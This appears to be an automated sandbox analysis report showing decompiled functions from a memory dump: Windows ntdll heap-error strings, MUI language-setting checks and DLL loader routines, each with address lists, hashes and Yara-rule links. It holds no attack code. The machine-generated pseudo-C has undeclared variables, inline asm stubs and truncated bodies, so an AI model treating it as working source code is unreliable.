heap_failure_invalid_allocation_type, xrefs: 04B71CB4
heap_failure_internal, xrefs: 04B71C6E
Parameter3: %p, xrefs: 04B71DEE
heap_failure_multiple_entries_corruption, xrefs: 04B71C8A
Last known valid blocks: before - %p, after - %p, xrefs: 04B71E45

Memory Dump Source

Source File: 00000015.00000002.506314048.0000000004A90000.00000040.00000001.sdmp, Offset: 04A90000, based on PE: true

Associated: 00000015.00000002.507407731.0000000004BAB000.00000040.00000001.sdmp Download File
Associated: 00000015.00000002.507425477.0000000004BAF000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID: Error code: %d - %s$HEAP: $HEAP[%wZ]: $Heap error detected at %p (heap handle %p)$Last known valid blocks: before - %p, after - %p$Parameter1: %p$Parameter2: %p$Parameter3: %p$Stack trace available at %p$heap_failure_block_not_busy$heap_failure_buffer_overrun$heap_failure_buffer_underrun$heap_failure_cross_heap_operation$heap_failure_entry_corruption$heap_failure_freelists_corruption$heap_failure_generic$heap_failure_internal$heap_failure_invalid_allocation_type$heap_failure_invalid_argument$heap_failure_lfh_bitmap_mismatch$heap_failure_listentry_corruption$heap_failure_multiple_entries_corruption$heap_failure_unknown$heap_failure_usage_after_free$heap_failure_virtual_block_corruption
API String ID: 0-2897834094
Opcode ID: c5e1f471f14b3ca53301d0045f61204bf70cb586cc92745c5c778a0327f09962
Instruction ID: 54f4996cfba5016da7f5a617a760ec8e4fe7fb9dcf4fbaf85193834f10d09f2d
Opcode Fuzzy Hash: c5e1f471f14b3ca53301d0045f61204bf70cb586cc92745c5c778a0327f09962
Instruction Fuzzy Hash: 9261EA32A62144EFE611DB98E585E2577ECFB04A3070984AAF4495F701D734BC60AFBA

Uniqueness

Uniqueness Score: -1.00%

Function 04AC3D34, Relevance: 6.7, Strings: 5, Instructions: 435
COMMON

Download Yara Rule

C-Code - Quality: 96%

			E04AC3D34(signed int* __ecx) {
				signed int* _v8;
				char _v12;
				signed int* _v16;
				signed int* _v20;
				char _v24;
				signed int _v28;
				signed int _v32;
				char _v36;
				signed int _v40;
				signed int _v44;
				signed int* _v48;
				signed int* _v52;
				signed int _v56;
				signed int _v60;
				char _v68;
				signed int _t140;
				signed int _t161;
				signed int* _t236;
				signed int* _t242;
				signed int* _t243;
				signed int* _t244;
				signed int* _t245;
				signed int _t255;
				void* _t257;
				signed int _t260;
				void* _t262;
				signed int _t264;
				void* _t267;
				signed int _t275;
				signed int* _t276;
				short* _t277;
				signed int* _t278;
				signed int* _t279;
				signed int* _t280;
				short* _t281;
				signed int* _t282;
				short* _t283;
				signed int* _t284;
				void* _t285;

				_v60 = _v60 | 0xffffffff;
				_t280 = 0;
				_t242 = __ecx;
				_v52 = __ecx;
				_v8 = 0;
				_v20 = 0;
				_v40 = 0;
				_v28 = 0;
				_v32 = 0;
				_v44 = 0;
				_v56 = 0;
				_t275 = 0;
				_v16 = 0;
				if(__ecx == 0) {
					_t280 = 0xc000000d;
					_t140 = 0;
					L50:
					 *_t242 =  *_t242 | 0x00000800;
					_t242[0x13] = _t140;
					_t242[0x16] = _v40;
					_t242[0x18] = _v28;
					_t242[0x14] = _v32;
					_t242[0x17] = _t275;
					_t242[0x15] = _v44;
					_t242[0x11] = _v56;
					_t242[0x12] = _v60;
					return _t280;
				}
				if(E04AC1B8F(L"WindowsExcludedProcs",  &_v36,  &_v12,  &_v8) >= 0) {
					_v56 = 1;
					if(_v8 != 0) {
						L04AD77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v8);
					}
					_v8 = _t280;
				}
				if(E04AC1B8F(L"Kernel-MUI-Number-Allowed",  &_v36,  &_v12,  &_v8) >= 0) {
					_v60 =  *_v8;
					L04AD77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v8);
					_v8 = _t280;
				}
				if(E04AC1B8F(L"Kernel-MUI-Language-Allowed",  &_v36,  &_v12,  &_v8) < 0) {
					L16:
					if(E04AC1B8F(L"Kernel-MUI-Language-Disallowed",  &_v36,  &_v12,  &_v8) < 0) {
						L28:
						if(E04AC1B8F(L"Kernel-MUI-Language-SKU",  &_v36,  &_v12,  &_v8) < 0) {
							L46:
							_t275 = _v16;
							L47:
							_t161 = 0;
							L48:
							if(_v8 != 0) {
								L04AD77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t161, _v8);
							}
							_t140 = _v20;
							if(_t140 != 0) {
								if(_t275 != 0) {
									L04AD77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t275);
									_t275 = 0;
									_v28 = 0;
									_t140 = _v20;
								}
							}
							goto L50;
						}
						_t167 = _v12;
						_t255 = _v12 + 4;
						_v44 = _t255;
						if(_t255 == 0) {
							_t276 = _t280;
							_v32 = _t280;
						} else {
							_t276 = L04AD4620(_t255,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t255);
							_t167 = _v12;
							_v32 = _t276;
						}
						if(_t276 == 0) {
							_v44 = _t280;
							_t280 = 0xc0000017;
							goto L46;
						} else {
							E04AFF3E0(_t276, _v8, _t167);
							_v48 = _t276;
							_t277 = E04B01370(_t276, 0x4a94e90);
							_pop(_t257);
							if(_t277 == 0) {
								L38:
								_t170 = _v48;
								if( *_v48 != 0) {
									E04AFBB40(0,  &_v68, _t170);
									if(L04AC43C0( &_v68,  &_v24) != 0) {
										_t280 =  &(_t280[0]);
									}
								}
								if(_t280 == 0) {
									_t280 = 0;
									L04AD77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v32);
									_v44 = 0;
									_v32 = 0;
								} else {
									_t280 = 0;
								}
								_t174 = _v8;
								if(_v8 != 0) {
									L04AD77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t174);
								}
								_v8 = _t280;
								goto L46;
							}
							_t243 = _v48;
							do {
								 *_t277 = 0;
								_t278 = _t277 + 2;
								E04AFBB40(_t257,  &_v68, _t243);
								if(L04AC43C0( &_v68,  &_v24) != 0) {
									_t280 =  &(_t280[0]);
								}
								_t243 = _t278;
								_t277 = E04B01370(_t278, 0x4a94e90);
								_pop(_t257);
							} while (_t277 != 0);
							_v48 = _t243;
							_t242 = _v52;
							goto L38;
						}
					}
					_t191 = _v12;
					_t260 = _v12 + 4;
					_v28 = _t260;
					if(_t260 == 0) {
						_t275 = _t280;
						_v16 = _t280;
					} else {
						_t275 = L04AD4620(_t260,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t260);
						_t191 = _v12;
						_v16 = _t275;
					}
					if(_t275 == 0) {
						_v28 = _t280;
						_t280 = 0xc0000017;
						goto L47;
					} else {
						E04AFF3E0(_t275, _v8, _t191);
						_t285 = _t285 + 0xc;
						_v48 = _t275;
						_t279 = _t280;
						_t281 = E04B01370(_v16, 0x4a94e90);
						_pop(_t262);
						if(_t281 != 0) {
							_t244 = _v48;
							do {
								 *_t281 = 0;
								_t282 = _t281 + 2;
								E04AFBB40(_t262,  &_v68, _t244);
								if(L04AC43C0( &_v68,  &_v24) != 0) {
									_t279 =  &(_t279[0]);
								}
								_t244 = _t282;
								_t281 = E04B01370(_t282, 0x4a94e90);
								_pop(_t262);
							} while (_t281 != 0);
							_v48 = _t244;
							_t242 = _v52;
						}
						_t201 = _v48;
						_t280 = 0;
						if( *_v48 != 0) {
							E04AFBB40(_t262,  &_v68, _t201);
							if(L04AC43C0( &_v68,  &_v24) != 0) {
								_t279 =  &(_t279[0]);
							}
						}
						if(_t279 == 0) {
							L04AD77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v16);
							_v28 = _t280;
							_v16 = _t280;
						}
						_t202 = _v8;
						if(_v8 != 0) {
							L04AD77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t202);
						}
						_v8 = _t280;
						goto L28;
					}
				}
				_t214 = _v12;
				_t264 = _v12 + 4;
				_v40 = _t264;
				if(_t264 == 0) {
					_v20 = _t280;
				} else {
					_t236 = L04AD4620(_t264,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t264);
					_t280 = _t236;
					_v20 = _t236;
					_t214 = _v12;
				}
				if(_t280 == 0) {
					_t161 = 0;
					_t280 = 0xc0000017;
					_v40 = 0;
					goto L48;
				} else {
					E04AFF3E0(_t280, _v8, _t214);
					_t285 = _t285 + 0xc;
					_v48 = _t280;
					_t283 = E04B01370(_t280, 0x4a94e90);
					_pop(_t267);
					if(_t283 != 0) {
						_t245 = _v48;
						do {
							 *_t283 = 0;
							_t284 = _t283 + 2;
							E04AFBB40(_t267,  &_v68, _t245);
							if(L04AC43C0( &_v68,  &_v24) != 0) {
								_t275 = _t275 + 1;
							}
							_t245 = _t284;
							_t283 = E04B01370(_t284, 0x4a94e90);
							_pop(_t267);
						} while (_t283 != 0);
						_v48 = _t245;
						_t242 = _v52;
					}
					_t224 = _v48;
					_t280 = 0;
					if( *_v48 != 0) {
						E04AFBB40(_t267,  &_v68, _t224);
						if(L04AC43C0( &_v68,  &_v24) != 0) {
							_t275 = _t275 + 1;
						}
					}
					if(_t275 == 0) {
						L04AD77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v20);
						_v40 = _t280;
						_v20 = _t280;
					}
					_t225 = _v8;
					if(_v8 != 0) {
						L04AD77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t225);
					}
					_v8 = _t280;
					goto L16;
				}
			}

0x04ac3d3c
0x04ac3d42
0x04ac3d44
0x04ac3d46
0x04ac3d49
0x04ac3d4c
0x04ac3d4f
0x04ac3d52
0x04ac3d55
0x04ac3d58
0x04ac3d5b
0x04ac3d5f
0x04ac3d61
0x04ac3d66
0x04b18213
0x04b18218
0x04ac4085
0x04ac4088
0x04ac408e
0x04ac4094
0x04ac409a
0x04ac40a0
0x04ac40a6
0x04ac40a9
0x04ac40af
0x04ac40b6
0x04ac40bd
0x04ac40bd
0x04ac3d83
0x04b1821f
0x04b18229
0x04b18238
0x04b18238
0x04b1823d
0x04b1823d
0x04ac3da0
0x04ac3daf
0x04ac3db5
0x04ac3dba
0x04ac3dba
0x04ac3dd4
0x04ac3e94
0x04ac3eab
0x04ac3f6d
0x04ac3f84
0x04ac406b
0x04ac406b
0x04ac406e
0x04ac406e
0x04ac4070
0x04ac4074
0x04b18351
0x04b18351
0x04ac407a
0x04ac407f
0x04b1835d
0x04b18370
0x04b18377
0x04b18379
0x04b1837c
0x04b1837c
0x04b1835d
0x00000000
0x04ac407f
0x04ac3f8a
0x04ac3f8d
0x04ac3f90
0x04ac3f95
0x04b1830d
0x04b1830f
0x04ac3f9b
0x04ac3fac
0x04ac3fae
0x04ac3fb1
0x04ac3fb1
0x04ac3fb6
0x04b18317
0x04b1831a
0x00000000
0x04ac3fbc
0x04ac3fc1
0x04ac3fc9
0x04ac3fd7
0x04ac3fda
0x04ac3fdd
0x04ac4021
0x04ac4021
0x04ac4029
0x04ac4030
0x04ac4044
0x04ac4046
0x04ac4046
0x04ac4044
0x04ac4049
0x04b18327
0x04b18334
0x04b18339
0x04b1833c
0x04ac404f
0x04ac404f
0x04ac404f
0x04ac4051
0x04ac4056
0x04ac4063
0x04ac4063
0x04ac4068
0x00000000
0x04ac4068
0x04ac3fdf
0x04ac3fe2
0x04ac3fe4
0x04ac3fe7
0x04ac3fef
0x04ac4003
0x04ac4005
0x04ac4005
0x04ac400c
0x04ac4013
0x04ac4016
0x04ac4017
0x04ac401b
0x04ac401e
0x00000000
0x04ac401e
0x04ac3fb6
0x04ac3eb1
0x04ac3eb4
0x04ac3eb7
0x04ac3ebc
0x04b182a9
0x04b182ab
0x04ac3ec2
0x04ac3ed3
0x04ac3ed5
0x04ac3ed8
0x04ac3ed8
0x04ac3edd
0x04b182b3
0x04b182b6
0x00000000
0x04ac3ee3
0x04ac3ee8
0x04ac3eed
0x04ac3ef0
0x04ac3ef3
0x04ac3f02
0x04ac3f05
0x04ac3f08
0x04b182c0
0x04b182c3
0x04b182c5
0x04b182c8
0x04b182d0
0x04b182e4
0x04b182e6
0x04b182e6
0x04b182ed
0x04b182f4
0x04b182f7
0x04b182f8
0x04b182fc
0x04b182ff
0x04b182ff
0x04ac3f0e
0x04ac3f11
0x04ac3f16
0x04ac3f1d
0x04ac3f31
0x04b18307
0x04b18307
0x04ac3f31
0x04ac3f39
0x04ac3f48
0x04ac3f4d
0x04ac3f50
0x04ac3f50
0x04ac3f53
0x04ac3f58
0x04ac3f65
0x04ac3f65
0x04ac3f6a
0x00000000
0x04ac3f6a
0x04ac3edd
0x04ac3dda
0x04ac3ddd
0x04ac3de0
0x04ac3de5
0x04b18245
0x04ac3deb
0x04ac3df7
0x04ac3dfc
0x04ac3dfe
0x04ac3e01
0x04ac3e01
0x04ac3e06
0x04b1824d
0x04b1824f
0x04b18254
0x00000000
0x04ac3e0c
0x04ac3e11
0x04ac3e16
0x04ac3e19
0x04ac3e29
0x04ac3e2c
0x04ac3e2f
0x04b1825c
0x04b1825f
0x04b18261
0x04b18264
0x04b1826c
0x04b18280
0x04b18282
0x04b18282
0x04b18289
0x04b18290
0x04b18293
0x04b18294
0x04b18298
0x04b1829b
0x04b1829b
0x04ac3e35
0x04ac3e38
0x04ac3e3d
0x04ac3e44
0x04ac3e58
0x04b182a3
0x04b182a3
0x04ac3e58
0x04ac3e60
0x04ac3e6f
0x04ac3e74
0x04ac3e77
0x04ac3e77
0x04ac3e7a
0x04ac3e7f
0x04ac3e8c
0x04ac3e8c
0x04ac3e91
0x00000000
0x04ac3e91

Strings

WindowsExcludedProcs, xrefs: 04AC3D6F
Kernel-MUI-Number-Allowed, xrefs: 04AC3D8C
Kernel-MUI-Language-SKU, xrefs: 04AC3F70
Kernel-MUI-Language-Allowed, xrefs: 04AC3DC0
Kernel-MUI-Language-Disallowed, xrefs: 04AC3E97

Memory Dump Source

Source File: 00000015.00000002.506314048.0000000004A90000.00000040.00000001.sdmp, Offset: 04A90000, based on PE: true

Associated: 00000015.00000002.507407731.0000000004BAB000.00000040.00000001.sdmp Download File
Associated: 00000015.00000002.507425477.0000000004BAF000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID: Kernel-MUI-Language-Allowed$Kernel-MUI-Language-Disallowed$Kernel-MUI-Language-SKU$Kernel-MUI-Number-Allowed$WindowsExcludedProcs
API String ID: 0-258546922
Opcode ID: e8fc157be7b9de2d1e4f24a21c8c7a39fcf0b8f2701d974514686727c65cd651
Instruction ID: c2cf7cdc281b6ff89698630902df16789e15fb2e7be207f1c4924c5750898fd9
Opcode Fuzzy Hash: e8fc157be7b9de2d1e4f24a21c8c7a39fcf0b8f2701d974514686727c65cd651
Instruction Fuzzy Hash: EEF12B76D00219EBDF15DF98C980AEEBBF9FF48754F14406AE905A7250E734AE01CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 04AE8E00, Relevance: 5.1, Strings: 4, Instructions: 126
COMMON

Download Yara Rule

C-Code - Quality: 44%

			E04AE8E00(void* __ecx) {
				signed int _v8;
				char _v12;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr* _t32;
				intOrPtr _t35;
				intOrPtr _t43;
				void* _t46;
				intOrPtr _t47;
				void* _t48;
				signed int _t49;
				void* _t50;
				intOrPtr* _t51;
				signed int _t52;
				void* _t53;
				intOrPtr _t55;

				_v8 =  *0x4bad360 ^ _t52;
				_t49 = 0;
				_t48 = __ecx;
				_t55 =  *0x4ba8464; // 0x75150110
				if(_t55 == 0) {
					L9:
					if( !_t49 >= 0) {
						if(( *0x4ba5780 & 0x00000003) != 0) {
							E04B35510("minkernel\\ntdll\\ldrsnap.c", 0x2b5, "LdrpFindDllActivationContext", 0, "Querying the active activation context failed with status 0x%08lx\n", _t49);
						}
						if(( *0x4ba5780 & 0x00000010) != 0) {
							asm("int3");
						}
					}
					return E04AFB640(_t49, 0, _v8 ^ _t52, _t47, _t48, _t49);
				}
				_t47 =  *((intOrPtr*)(__ecx + 0x18));
				_t43 =  *0x4ba7984; // 0x952bd0
				if( *((intOrPtr*)( *[fs:0x30] + 0x1f8)) == 0 || __ecx != _t43) {
					_t32 =  *((intOrPtr*)(_t48 + 0x28));
					if(_t48 == _t43) {
						_t50 = 0x5c;
						if( *_t32 == _t50) {
							_t46 = 0x3f;
							if( *((intOrPtr*)(_t32 + 2)) == _t46 &&  *((intOrPtr*)(_t32 + 4)) == _t46 &&  *((intOrPtr*)(_t32 + 6)) == _t50 &&  *((intOrPtr*)(_t32 + 8)) != 0 &&  *((short*)(_t32 + 0xa)) == 0x3a &&  *((intOrPtr*)(_t32 + 0xc)) == _t50) {
								_t32 = _t32 + 8;
							}
						}
					}
					_t51 =  *0x4ba8464; // 0x75150110
					 *0x4bab1e0(_t47, _t32,  &_v12);
					_t49 =  *_t51();
					if(_t49 >= 0) {
						L8:
						_t35 = _v12;
						if(_t35 != 0) {
							if( *((intOrPtr*)(_t48 + 0x48)) != 0) {
								E04AE9B10( *((intOrPtr*)(_t48 + 0x48)));
								_t35 = _v12;
							}
							 *((intOrPtr*)(_t48 + 0x48)) = _t35;
						}
						goto L9;
					}
					if(_t49 != 0xc000008a) {
						if(_t49 != 0xc000008b && _t49 != 0xc0000089 && _t49 != 0xc000000f && _t49 != 0xc0000204 && _t49 != 0xc0000002) {
							if(_t49 != 0xc00000bb) {
								goto L8;
							}
						}
					}
					if(( *0x4ba5780 & 0x00000005) != 0) {
						_push(_t49);
						E04B35510("minkernel\\ntdll\\ldrsnap.c", 0x298, "LdrpFindDllActivationContext", 2, "Probing for the manifest of DLL \"%wZ\" failed with status 0x%08lx\n", _t48 + 0x24);
						_t53 = _t53 + 0x1c;
					}
					_t49 = 0;
					goto L8;
				} else {
					goto L9;
				}
			}

0x04ae8e0f
0x04ae8e16
0x04ae8e19
0x04ae8e1b
0x04ae8e21
0x04ae8e7f
0x04ae8e85
0x04b29354
0x04b2936c
0x04b29371
0x04b2937b
0x04b29381
0x04b29381
0x04b2937b
0x04ae8e9d
0x04ae8e9d
0x04ae8e29
0x04ae8e2c
0x04ae8e38
0x04ae8e3e
0x04ae8e43
0x04ae8eb5
0x04ae8eb9
0x04b292aa
0x04b292af
0x04b292e8
0x04b292e8
0x04b292af
0x04ae8eb9
0x04ae8e45
0x04ae8e53
0x04ae8e5b
0x04ae8e5f
0x04ae8e78
0x04ae8e78
0x04ae8e7d
0x04ae8ec3
0x04ae8ecd
0x04ae8ed2
0x04ae8ed2
0x04ae8ec5
0x04ae8ec5
0x00000000
0x04ae8e7d
0x04ae8e67
0x04ae8ea4
0x04b2931a
0x00000000
0x00000000
0x04b29320
0x04ae8ea4
0x04ae8e70
0x04b29325
0x04b29340
0x04b29345
0x04b29345
0x04ae8e76
0x00000000
0x00000000
0x00000000
0x00000000

Strings

Querying the active activation context failed with status 0x%08lx, xrefs: 04B29357
LdrpFindDllActivationContext, xrefs: 04B29331, 04B2935D
Probing for the manifest of DLL "%wZ" failed with status 0x%08lx, xrefs: 04B2932A
minkernel\ntdll\ldrsnap.c, xrefs: 04B2933B, 04B29367

Memory Dump Source

Source File: 00000015.00000002.506314048.0000000004A90000.00000040.00000001.sdmp, Offset: 04A90000, based on PE: true

Associated: 00000015.00000002.507407731.0000000004BAB000.00000040.00000001.sdmp Download File
Associated: 00000015.00000002.507425477.0000000004BAF000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID: LdrpFindDllActivationContext$Probing for the manifest of DLL "%wZ" failed with status 0x%08lx$Querying the active activation context failed with status 0x%08lx$minkernel\ntdll\ldrsnap.c
API String ID: 0-3779518884
Opcode ID: e7e9939650f27428e566b3f9a16f4429579fbb01979cc1ebc4f49e03c0fd0299
Instruction ID: e110a67fc158ca3c0783a020bfbbb12f4ccea84d2eaeeb4f845813df54c23c96
Opcode Fuzzy Hash: e7e9939650f27428e566b3f9a16f4429579fbb01979cc1ebc4f49e03c0fd0299
Instruction Fuzzy Hash: BF41D432F00315AFDF35BF5A8889A76B2B5FB04754F0A816EE82857191E778FD808791

Uniqueness

Uniqueness Score: -1.00%

Function 04AC8794, Relevance: 4.0, Strings: 3, Instructions: 255
COMMON

Download Yara Rule

C-Code - Quality: 83%

			E04AC8794(void* __ecx) {
				signed int _v0;
				char _v8;
				signed int _v12;
				void* _v16;
				signed int _v20;
				intOrPtr _v24;
				signed int _v28;
				signed int _v32;
				signed int _v40;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr* _t77;
				signed int _t80;
				signed char _t81;
				signed int _t87;
				signed int _t91;
				void* _t92;
				void* _t94;
				signed int _t95;
				signed int _t103;
				signed int _t105;
				signed int _t110;
				signed int _t118;
				intOrPtr* _t121;
				intOrPtr _t122;
				signed int _t125;
				signed int _t129;
				signed int _t131;
				signed int _t134;
				signed int _t136;
				signed int _t143;
				signed int* _t147;
				signed int _t151;
				void* _t153;
				signed int* _t157;
				signed int _t159;
				signed int _t161;
				signed int _t166;
				signed int _t168;

				_push(__ecx);
				_t153 = __ecx;
				_t159 = 0;
				_t121 = __ecx + 0x3c;
				if( *_t121 == 0) {
					L2:
					_t77 =  *((intOrPtr*)(_t153 + 0x58));
					if(_t77 == 0 ||  *_t77 ==  *((intOrPtr*)(_t153 + 0x54))) {
						_t122 =  *((intOrPtr*)(_t153 + 0x20));
						_t180 =  *((intOrPtr*)(_t122 + 0x3a));
						if( *((intOrPtr*)(_t122 + 0x3a)) != 0) {
							L6:
							if(E04AC934A() != 0) {
								_t159 = E04B3A9D2( *((intOrPtr*)( *((intOrPtr*)(_t153 + 0x20)) + 0x18)), 0, 0);
								__eflags = _t159;
								if(_t159 < 0) {
									_t81 =  *0x4ba5780; // 0x0
									__eflags = _t81 & 0x00000003;
									if((_t81 & 0x00000003) != 0) {
										_push(_t159);
										E04B35510("minkernel\\ntdll\\ldrsnap.c", 0x235, "LdrpDoPostSnapWork", 0, "LdrpDoPostSnapWork:Unable to unsuppress the export suppressed functions that are imported in the DLL based at 0x%p.Status = 0x%x\n",  *((intOrPtr*)( *((intOrPtr*)(_t153 + 0x20)) + 0x18)));
										_t81 =  *0x4ba5780; // 0x0
									}
									__eflags = _t81 & 0x00000010;
									if((_t81 & 0x00000010) != 0) {
										asm("int3");
									}
								}
							}
						} else {
							_t159 = E04AC849B(0, _t122, _t153, _t159, _t180);
							if(_t159 >= 0) {
								goto L6;
							}
						}
						_t80 = _t159;
						goto L8;
					} else {
						_t125 = 0x13;
						asm("int 0x29");
						_push(0);
						_push(_t159);
						_t161 = _t125;
						_t87 =  *( *[fs:0x30] + 0x1e8);
						_t143 = 0;
						_v40 = _t161;
						_t118 = 0;
						_push(_t153);
						__eflags = _t87;
						if(_t87 != 0) {
							_t118 = _t87 + 0x5d8;
							__eflags = _t118;
							if(_t118 == 0) {
								L46:
								_t118 = 0;
							} else {
								__eflags =  *(_t118 + 0x30);
								if( *(_t118 + 0x30) == 0) {
									goto L46;
								}
							}
						}
						_v32 = 0;
						_v28 = 0;
						_v16 = 0;
						_v20 = 0;
						_v12 = 0;
						__eflags = _t118;
						if(_t118 != 0) {
							__eflags = _t161;
							if(_t161 != 0) {
								__eflags =  *(_t118 + 8);
								if( *(_t118 + 8) == 0) {
									L22:
									_t143 = 1;
									__eflags = 1;
								} else {
									_t19 = _t118 + 0x40; // 0x40
									_t156 = _t19;
									E04AC8999(_t19,  &_v16);
									__eflags = _v0;
									if(_v0 != 0) {
										__eflags = _v0 - 1;
										if(_v0 != 1) {
											goto L22;
										} else {
											_t128 =  *(_t161 + 0x64);
											__eflags =  *(_t161 + 0x64);
											if( *(_t161 + 0x64) == 0) {
												goto L22;
											} else {
												E04AC8999(_t128,  &_v12);
												_t147 = _v12;
												_t91 = 0;
												__eflags = 0;
												_t129 =  *_t147;
												while(1) {
													__eflags =  *((intOrPtr*)(0x4ba5c60 + _t91 * 8)) - _t129;
													if( *((intOrPtr*)(0x4ba5c60 + _t91 * 8)) == _t129) {
														break;
													}
													_t91 = _t91 + 1;
													__eflags = _t91 - 5;
													if(_t91 < 5) {
														continue;
													} else {
														_t131 = 0;
														__eflags = 0;
													}
													L37:
													__eflags = _t131;
													if(_t131 != 0) {
														goto L22;
													} else {
														__eflags = _v16 - _t147;
														if(_v16 != _t147) {
															goto L22;
														} else {
															E04AD2280(_t92, 0x4ba86cc);
															_t94 = E04B89DFB( &_v20);
															__eflags = _t94 - 1;
															if(_t94 != 1) {
															}
															asm("movsd");
															asm("movsd");
															asm("movsd");
															asm("movsd");
															 *_t118 =  *_t118 + 1;
															asm("adc dword [ebx+0x4], 0x0");
															_t95 = E04AE61A0( &_v32);
															__eflags = _t95;
															if(_t95 != 0) {
																__eflags = _v32 | _v28;
																if((_v32 | _v28) != 0) {
																	_t71 = _t118 + 0x40; // 0x3f
																	_t134 = _t71;
																	goto L55;
																}
															}
															goto L30;
														}
													}
													goto L56;
												}
												_t92 = 0x4ba5c64 + _t91 * 8;
												asm("lock xadd [eax], ecx");
												_t131 = (_t129 | 0xffffffff) - 1;
												goto L37;
											}
										}
										goto L56;
									} else {
										_t143 = E04AC8A0A( *((intOrPtr*)(_t161 + 0x18)),  &_v12);
										__eflags = _t143;
										if(_t143 != 0) {
											_t157 = _v12;
											_t103 = 0;
											__eflags = 0;
											_t136 =  &(_t157[1]);
											 *(_t161 + 0x64) = _t136;
											_t151 =  *_t157;
											_v20 = _t136;
											while(1) {
												__eflags =  *((intOrPtr*)(0x4ba5c60 + _t103 * 8)) - _t151;
												if( *((intOrPtr*)(0x4ba5c60 + _t103 * 8)) == _t151) {
													break;
												}
												_t103 = _t103 + 1;
												__eflags = _t103 - 5;
												if(_t103 < 5) {
													continue;
												}
												L21:
												_t105 = E04AFF380(_t136, 0x4a91184, 0x10);
												__eflags = _t105;
												if(_t105 != 0) {
													__eflags =  *_t157 -  *_v16;
													if( *_t157 >=  *_v16) {
														goto L22;
													} else {
														asm("cdq");
														_t166 = _t157[5] & 0x0000ffff;
														_t108 = _t157[5] & 0x0000ffff;
														asm("cdq");
														_t168 = _t166 << 0x00000010 | _t157[5] & 0x0000ffff;
														__eflags = ((_t151 << 0x00000020 | _t166) << 0x10 | _t151) -  *((intOrPtr*)(_t118 + 0x2c));
														if(__eflags > 0) {
															L29:
															E04AD2280(_t108, 0x4ba86cc);
															 *_t118 =  *_t118 + 1;
															_t42 = _t118 + 0x40; // 0x3f
															_t156 = _t42;
															asm("adc dword [ebx+0x4], 0x0");
															asm("movsd");
															asm("movsd");
															asm("movsd");
															asm("movsd");
															_t110 = E04AE61A0( &_v32);
															__eflags = _t110;
															if(_t110 != 0) {
																__eflags = _v32 | _v28;
																if((_v32 | _v28) != 0) {
																	_t134 = _v20;
																	L55:
																	E04B89D2E(_t134, 1, _v32, _v28,  *(_v24 + 0x24) & 0x0000ffff,  *((intOrPtr*)(_v24 + 0x28)));
																}
															}
															L30:
															 *_t118 =  *_t118 + 1;
															asm("adc dword [ebx+0x4], 0x0");
															E04ACFFB0(_t118, _t156, 0x4ba86cc);
															goto L22;
														} else {
															if(__eflags < 0) {
																goto L22;
															} else {
																__eflags = _t168 -  *((intOrPtr*)(_t118 + 0x28));
																if(_t168 <  *((intOrPtr*)(_t118 + 0x28))) {
																	goto L22;
																} else {
																	goto L29;
																}
															}
														}
													}
													goto L56;
												}
												goto L22;
											}
											asm("lock inc dword [eax]");
											goto L21;
										}
									}
								}
							}
						}
						return _t143;
					}
				} else {
					_push( &_v8);
					_push( *((intOrPtr*)(__ecx + 0x50)));
					_push(__ecx + 0x40);
					_push(_t121);
					_push(0xffffffff);
					_t80 = E04AF9A00();
					_t159 = _t80;
					if(_t159 < 0) {
						L8:
						return _t80;
					} else {
						goto L2;
					}
				}
				L56:
			}

0x04ac8799
0x04ac879d
0x04ac87a1
0x04ac87a3
0x04ac87a8
0x04ac87c3
0x04ac87c3
0x04ac87c8
0x04ac87d1
0x04ac87d4
0x04ac87d8
0x04ac87e5
0x04ac87ec
0x04b19bfe
0x04b19c00
0x04b19c02
0x04b19c08
0x04b19c0d
0x04b19c0f
0x04b19c14
0x04b19c2d
0x04b19c32
0x04b19c37
0x04b19c3a
0x04b19c3c
0x04b19c42
0x04b19c42
0x04b19c3c
0x04b19c02
0x04ac87da
0x04ac87df
0x04ac87e3
0x00000000
0x00000000
0x04ac87e3
0x04ac87f2
0x00000000
0x04ac87fb
0x04ac87fd
0x04ac87fe
0x04ac880e
0x04ac880f
0x04ac8810
0x04ac8814
0x04ac881a
0x04ac881c
0x04ac881f
0x04ac8821
0x04ac8822
0x04ac8824
0x04ac8826
0x04ac882c
0x04ac882e
0x04b19c48
0x04b19c48
0x04ac8834
0x04ac8834
0x04ac8837
0x00000000
0x00000000
0x04ac8837
0x04ac882e
0x04ac883d
0x04ac8840
0x04ac8843
0x04ac8846
0x04ac8849
0x04ac884c
0x04ac884e
0x04ac8850
0x04ac8852
0x04ac8854
0x04ac8857
0x04ac88b4
0x04ac88b6
0x04ac88b6
0x04ac8859
0x04ac8859
0x04ac8859
0x04ac8861
0x04ac8866
0x04ac886a
0x04ac893d
0x04ac8941
0x00000000
0x04ac8947
0x04ac8947
0x04ac894a
0x04ac894c
0x00000000
0x04ac8952
0x04ac8955
0x04ac895a
0x04ac895d
0x04ac895d
0x04ac895f
0x04ac8961
0x04ac8961
0x04ac8968
0x00000000
0x00000000
0x04ac896a
0x04ac896b
0x04ac896e
0x00000000
0x04ac8970
0x04ac8970
0x04ac8970
0x04ac8970
0x04ac8972
0x04ac8972
0x04ac8974
0x00000000
0x04ac897a
0x04ac897a
0x04ac897d
0x00000000
0x04ac8983
0x04b19c65
0x04b19c6d
0x04b19c72
0x04b19c75
0x04b19c75
0x04b19c82
0x04b19c86
0x04b19c87
0x04b19c88
0x04b19c89
0x04b19c8c
0x04b19c90
0x04b19c95
0x04b19c97
0x04b19ca0
